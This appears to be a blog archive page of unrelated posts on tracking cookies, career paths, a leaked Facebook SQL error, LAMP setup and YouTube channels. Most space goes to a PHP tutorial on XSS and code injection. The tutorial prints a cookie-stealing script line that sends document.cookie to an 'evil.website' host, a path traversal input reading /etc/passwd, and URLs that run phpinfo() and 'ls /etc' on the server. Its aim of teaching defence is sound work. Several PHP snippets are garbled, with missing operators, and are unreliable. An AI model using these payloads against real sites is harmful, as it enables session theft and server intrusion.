Search Google

Sunday, 27 December 2020

how do tracking cookies facebook and google pixel tag work

 

What are Cookies?

Cookies, (formally called “web cookies,” “browser cookies,” or “HTTP Cookies,”) are little pieces of data stored in your web browser. These pieces of data are sent from a website to your browser, and your browser then sends them back without altering them. Imagine it as an ongoing game of catch: a website and web browser throwing a piece of data back and forth. 

Cookies can be very beneficial. When a website remembers your username or keeps your shopping cart set for later, that’s due to an authentication cookie. Other types of cookies can be more invasive; a tracking cookie can store years of users’ session data on a web browser. This immensely helps companies market products and services as they can use the data to create a better user experience. However, users may be uncomfortable surrendering these large quantities of data.

If you’d like to remove tracking cookie data from your browser, go into your browser options and click to clear all cookies. A quick Google search will tell you how to do it based on your browser of choice.

The General Data Protection Regulation (GDPR) was passed in 2016 by the European Union to help protect online privacy. Businesses that have website users in the EU must announce to their local customers when they are using cookies to collect data, and give them an opportunity to leave the site if they don’t want their information to be shared. Among other things, this act gives users the right to contact a company and ask that any information they may have on them be permanently deleted. (Think email, address, phone number, shopping habits, etc.)

What is a Snippet?

Generally speaking, a code snippet is small-ish portion of reusable source code, machine code, or text. Snippets are used to help programmers avoid typing long, repetitive code. (Think of it as an opportunity to “work smarter not harder.”) Many behavior-based applications such as Google Analytics, Lucky Orange, FOMO, Facebook, and Linkedin use customized snippets to track relevant data. For example, the Google Analytics snippet is a small piece of JavaScript code that you paste into your webpages. It activates Google Analytics tracking when someone is on that page. We often use Google Tag Manager to implement these snippets. Learn about other basic Google Tools.

What is a Tag?

Tags are small snippets of code that label and describe certain elements on the page and its attributes. Tags include the meta title and description that tell search engines the main focus of a page, the copyright tag that displays when the website was made, and the robots tag that tells search engines whether to add certain URLs to their index. Optimizing certain meta tags is an important aspect of SEO, as it directs search engines to the most relevant information available.

What is Facebook Pixel?

A pixel is a snippet of code that’s placed on a website by a third party ad tool to track user behavior. For example, when a user clicks on a Facebook ad, the Facebook Pixel tracks whether the user buys products from the website. Ad servers, (in this case Facebook), use pixels because they cannot communicate with the browser directly through other websites using cookies. Without the pixel, the website can’t accredit which third party ad tool a sale came from, and the ad tool can’t track which ads lead to the most sales.

Facebook Pixel helps companies market their products or services to users solely on Facebook (and Facebook-owned Instagram). When a company has gathered enough user data, it can use the sales trends to optimize ads for conversions, create look-a-like audiences based on current user behavior, and remarket ads based on specific actions taken on a website. For example, if you’ve ever looked online for a new jacket, logged onto Facebook, and immediately seen an ad for that exact jacket, you can thank the Facebook Pixel. 


  1. You pick up a tracking cookie on your favorite blog or shopping site. That cookie contains a unique ID that doesn’t identify you personally, but does identify your web browser.
  2. The owner of the shopping site signs up and pays for an advertising platform like Google.
  3. Google’s ads aren’t static; when you visit other websites that use Google ads to make money, the website sees the cookie and sends it to Google through the ad. Google sees the unique ID stored in the cookie and recognizes that it came from your favorite shopping site.
  4. Google then shows an ad for the shopping site accordingly.

Likewise, other advertisers on Google’s ad network can use that cookie, too, if your advertising profile meets their criteria of the target audience. It doesn’t only benefit the site where you picked up the cookie.


First-Party vs. Third-Party Cookies

Some cookies may pack more of a threat than others depending on where they come from.

First-party cookies are directly created by the website you are using. These are generally safer, as long as you are browsing reputable websites or ones that have not been compromised.

Third-party cookies are more troubling. They are generated by websites that are different from the web pages users are currently surfing, usually because they're linked to ads on that page.

Visiting a site with 10 ads may generate 10 cookies, even if users never click on those ads.

Third-party cookies let advertisers or analytics companies track an individual's browsing history across the web on any sites that contain their ads.

Consequently, the advertiser could determine that a user first searched for running apparel at a specific outdoor store before checking a particular sporting goods site and then a certain online sportswear boutique.

Zombie cookies are from a third-party and permanently installed on users' computers, even when they opt not to install cookies. They also reappear after they've been deleted. When zombie cookies first appeared, they were created from data stored in the Adobe Flash storage bin. They are sometimes called “flash cookies” and are extremely difficult to remove.

Like other third-party cookies, zombie cookies can be used by web analytics companies to track unique individuals' browsing histories. Websites may also use zombies to ban specific users


Keywords

tracking cookies example,

cookie tracking software,

how do cookies track you,

how do cookies work,

tracking cookies removal,

what are cookies,

how to stop tracking cookies,

how to use cookies to track visitors,


Sunday, 20 December 2020

Career path for Software engineer student & developer AI ML and CLOUD 2021

1. Artificial intelligence 
 Artificial intelligence, is intelligence demonstrated by machines, unlike the natural intelligence displayed by humans and animals. 




 2. machine learning & data science 
Machine learning is the study of computer algorithms that improve automatically through experience. It is seen as a subset of artificial intelligence. 

 3. Devops & Cloud AWS 
 At its core,  DevOps is the automation of agile methodology. The idea is to empower developers to respond to the needs of the business in near real-time. ... Most public and private cloud computing providers support DevOps systemically on their platform, including continuous integration and continuous development tools.

 Learn machine learning & data science in SIX MONTHS 





 learning path for software developer, software engineer career path salary, which field is best in software engineering, how to become a software engineer software engineer salary software engineer career path india software engineer career path reddit software developer career

drupal 9 training

 




what is drupal 9

drupal site builder jobs

drupal 8 topics

drupal 8 documentation

drupal guidelines

drupal admin guide

drupal basics

drupal org user guide

drupal 8 training free

drupal course

free drupal training

best drupal training

drupal tutorial

drupal certification training

drupal training for beginners

drupal 7 training videos free

Friday, 10 July 2020

Facebook ads campaign vulnerability

Facebook is well known social site but they are directly printing table name and query which might be big security breach and vulnerability which might cause lots of loss to Facebook 

Recently I was creating my ad campaign and found bugs on Facebook 

QueryLockTimeoutException: Lock wait timeout exceeded; try restarting transaction: Timeout on record in index: db64744/campaign_groups.PRIMARY; 'SELECT id, account_id, name, objective, promoted_object_id, run_status, time_created, time_updated, topline_id, buying_type, legacy_buying_type, source_campaign_group_id, kpi_type, kpi_custom_conversion_id, is_autobid, is_average_price_pacing, bid_strategy, regulated_category, issues_info, smart_promotion_type, run_status_user_set, post_processing_version, value_spec_event_funnel_id, collaborative_ads_partner_info, regulated_category_set_by_user, regulated_categories, last_meaningful_touched_by_app_id, selected_authorized_country, advertiser_intent FROM `campaign_groups` WHERE id IN (23845393178580744) FOR UPDATE' TAAL[BLAME_dirs,www/flib/core/db/:BLAME_files,www/flib/core/smc/db.php


You can see table name is campaign_groups and fields are  

id, account_id, name, objective, promoted_object_id, run_status, time_created, time_updated, topline_id, buying_type, legacy_buying_type, source_campaign_group_id, kpi_type, kpi_custom_conversion_id, is_autobid, is_average_price_pacing, bid_strategy, regulated_category, issues_info, smart_promotion_type, run_status_user_set, post_processing_version, value_spec_event_funnel_id, collaborative_ads_partner_info, regulated_category_set_by_user, regulated_categories, last_meaningful_touched_by_app_id, selected_authorized_country, advertiser_intent


And query which failed due to time out issue is  

SELECT id, account_id, name, objective, promoted_object_id, run_status, time_created, time_updated, topline_id, buying_type, legacy_buying_type, source_campaign_group_id, kpi_type, kpi_custom_conversion_id, is_autobid, is_average_price_pacing, bid_strategy, regulated_category, issues_info, smart_promotion_type, run_status_user_set, post_processing_version, value_spec_event_funnel_id, collaborative_ads_partner_info, regulated_category_set_by_user, regulated_categories, last_meaningful_touched_by_app_id, selected_authorized_country, advertiser_intent FROM `campaign_groups` WHERE id IN (2384539317858067)








Monday, 1 February 2016

install lamp php apache on ubuntu

The commands we are using in the terminal are as follows:
sudo apt-get install apache2
sudo apt-get install php5
sudo apt-get install mysql-server
sudo apt-get install php5-mysql

Friday, 15 January 2016

Drupal 7 theme free

How to build TB Sirate

This guide will give you the basic information on the preparation steps and guide you to build the content for TB Sirate, as same as the demo site.
Please use the overview of regions as your reference.
Preview regions with theme background Full image overview of theme regions with background image
Preview regions with plain background Full image overview of theme regions with plain color

Friday, 13 November 2015

php security tutorial

 PHP SCRIPT

http://www.phpjunkyard.com/

http://www.hotscripts.com/category/scripts/php/scripts-programs/

https://www.phpjabbers.com/tutorials.php

http://www.thefreecountry.com/php/









This tutorial explains how hackers can use XSS (cross-site scripting) and code injection when your PHP code isn't properly secured. These are two of the most common vulnerabilities found in PHP scripts, and both of them are exploited by malicious input from users. Therefore it's important to remember never to thrust user's input.

XSS

XSS is a form of code injection by the user (attacker) into your webpage. XSS can happen anywhere where your website displays user generated data. If this data isn't validated or encoded, an attacker can input and run malicious code (usually javascript, but it can also be any other kind of script or html) on your visitor's webbrowsers. This code can, for example, access cookies and session tokens and forward this data to the attackers website. XSS attackers usually don't attack your website itself, but aim to attack your visitors. There are two types of XSS attacks. The non-persistent type is where an attacker doesn't actually alter the code of your page. The persistent type is when an attacker permanently changes the code of your page.

A classic example of non-persistent XSS vulnerability :

 
<html>
<?phpif  (isset($_GET["value"]))
{
echo "the value you entered : " $_GET["value"] ;
}?><br />
<br />
<a href="?value=<script src=http://test.codebase.eu/xss.js></script>" >Click here to test for XSS on your browser</a>
<html>
 
This simple example displays any value you provide it with. If you enter <h3>hello</h3> you will see 'hello' displayed. But the page also reads the html tags and therefore display 'hello' in a larger fontsize.
This is a harmless example of XSS. A more problematic example would be if the users starts entering javascript. For example :

phpfile.php?value=<script src=http://test.codebase.eu/xss.js> </script>

In this case xss.js is a script that posts a cookie to the attackers website:
alert ('Your cookie wil now be posted to the attackers website');
window.location='http://evil.website/cookie_stealer.php?cookie='+document.cookie;
Using the example above, an attacker can make a user go to yourwebsite.com/phpfile.php?value=<script src=http://test.codebase.eu/xss.js> </script> and it will redirect the users browser, stealing the users cookie in the process, to the attackers website.

An attacker does not necessarily need to post data. Sometimes it's enough for a global PHP variable to display information an attacker can affect:
 
<html>
<body>
<?phpecho "Page you requested : "  urldecode($_SERVER["REQUEST_URI"]);?><br />
<a href="?value=<SCRIPT SRC=http://test.codebase.eu/xss.js></SCRIPT>"> Click here to test for XSS on your browser</a>
</body>
</html>
 
Using the phpfile above an URL request like phpfile.php?<script>alert(document.cookie);</script> would give an attacker the possibility to execute scripts.

Some browsers (Chrome,Safari and IE) have build in protection against non-persistent XSS attacks (firefox doesn't at the time of writing this). However, it isn't wise to rely on the users browsers to deal with XSS attacks on your website. Some users may use older browsers that don't have an XSS filter or use browsers where the XSS filter doesn't work properly. Also attackers are constantly trying to find ways to bypass XSS filters and often succeed. Furthermore, the filters don't work for persistent XSS attacks.

Persistent XSS attacks

An example of a persistent xss vulnerable code :
 
<?phpif(isset($_GET["message"]))
{$fp fopen('data.txt''w');fwrite($fp$_GET["message"]);fclose($fp);
}?><form action="" method="get">
Add to the guestbook: <input type="text" name="message" size="60" value="<script src=http://test.codebase.eu/xss.js> </script>"  />
<input type="submit" />
</form>
<br />

Guest book data :
<?php include('data.txt');?>

An attacker could now add any javascript code into the guestbook and every visitor that visits the page will run it. This kind of XSS attack is more dangerous and not detectable by browsers.

Note that the example above is not only vulnerable to XSS attacks, but also to the much more dangerous PHP code injection (see below for more information on that subject).

How to prevent XSS attacks

There are good functions available in PHP to clean user input:

Strip_tags

this function strips all '<' and '>' characters from a string.
Remeber that only removing certain tags won't help you much if you allow users to modify tag atributes.
For example displaying an image in a PHP file :

<img src="<php echo $user_uploaded_image ; ?>" >

Altering $user_uploaded_image to image1.jpg" onClick="alert('Hello!'); will result in the HTML of that page looking like:

<img src="image1.jpg" onClick="alert('Hello!');" >

Htmlspecialchars and htmlentities

An other PHP function you can use to prevent XSS attacks is htmlspecialchars. This function will translate the input and convert characters like & and < into &amp; and &lt; preventing your browser reading those characters as code. You should use this function when you want your users to be able to post tags on your pages. The htmlentities is identical to htmlspecialchars, except ALL characters which can be converted into HTML character entities are converted. I recommend using one of these two functions for input cleaning.

Probably the most secure way would be allowing only characters a-Z and 0-9 or filtering out any other unwanted characters. This can be done using the preg_match and preg_replace functions.

Securing cookies

If you have sensetive data in plain text in your cookie, it would be a good idea to encrypt it. An other way to secure your cookies is using the httponly flag (available since PHP 5.2.0). If you set this flag, client side scripts like javascript cannot access the cookie. To set a httponly-cookie use for example :
setcookie("cookiename", "value", NULL, NULL, NULL, NULL,TRUE);

Code injection

Code injection happens when an attacker manages to make the server execute PHP code he or she injected. This poses a much bigger security thread than XSS does.

You've already seen an example of code that is vulnerable to code injection in the guestbook example above. If, for example, you would add an entry to the guestbook looking like <?php phpinfo(); ?> , anybody can run any PHP code on your server.

File inclusion

Giving users the ability to provide input for an include or require function is always dangerous (specially if you allow remote file inclusions). Look at the following example:

<?php
   $language $_GET['language'] ;
   include( $language );?>

This function is supposed to include a language file e.g. english.php or dutch.php, but the user can provide input like: ../../../../../../../../etc/passwd and read your passwd file or any file that is readable by your webserver on your server.

Writing to files

If you allow users to write to a file that is included in a PHP page you should always remeber to check the input. You might think that the following PHP code looks okay:

<?php
$fp fopen("file.ext""w");

    $userdata=$_GET['user_input'];
      fwrite($fp"<?php \$usr='$userdata'; ?>");          
      fclose($fp);

include ('file.ext');
echo "the user data is : $usr";
?>

As expected a user can input "hello" and the user data will be just hello. An attacker can make an URL like this :
phpfile.php?user_input=hello'%20;%20phpinfo()%20;%20$dummyvar='foobar and $userdata will still be "hello" , but also phpinfo(); is executed (to make the PHP code execute correctly, %20$dummyvar='foobar is added).

Dangerous functions

Code injection can also happen if you allow user input to be processed by other php functions. A couple of examples:

<?php
highlight_file ($_GET['arg3'])passthru("echo " $_GET['arg2']);$myvar 'some_value';$x $_GET['arg'];
eval('$myvar = ' $x ';');?>

An attacker could craft an URL like this:
phpfile.php?arg=phpinfo();&arg2=hello ;ls /etc&arg3=phpfile.php
and the result will be the page showing a) the source code of itself, b) a directory listing, c) information about your PHP installation.

I can't guarantee your PHP code will be hacker safe if you read and understood this tutorial, because only the most common security problems where handled in this tutorial, but it should at least make your PHP code a little safer.

If you want to know whether your PHP installation and php.ini settings are safe, take a look here.

Wednesday, 11 November 2015

Youtube money

Kaise Yoiutube par Multiple Channel Banaye Ek Email Id se

New Channel Banane ke liye –
Step 1. Google ke Account me Sign in kare.
Step 2. Ab Youtube Channel Switcher me jaye.
Step 3. Create a new channel ki button par click kare. (Note: Agar Aapka Phele se Google+ Page hai or aap ussi naam se Channel banana chate hai to aap uske naam par click karke bhi bana sakte hai, wo aapko list me dikh jayega.)
Channel Switcher par ja kar creater new channel par click kare
Step 4. Ab ek form aayega
channel ka naam or uski detaial dale create karne ke liye
  1. Channel ka Naam Dale
  2. Category select kare channel ki
  3. Term ko pad kar tik kare.
  4. Finished ki button par click kare.
jese hi finished karege aapki New Youtube Channel Ban jayegi
youtube ka channel create ho chuka hai.
Ab aapki Channel to Ban Chuki hai,
To ab aapko agar ek se jada channel chalani hai to aapko alag-alag email id or bar bar login karne ki jarurat nahi hai.. Aap Simple Channel Switcher me ja kar apni dusri Channel Select karke usko use kar sakte hai.
Youtube ke bare me ham or bhi bhut si jaakari aage janege, taki  ham Apni Channel ko or bhatar bana kar badiya paise kama sake.
Kuch or jaruri jaankari Youtube ke bare me –
Agar aapka koi sabal hai to aap comment me puch sakte hai..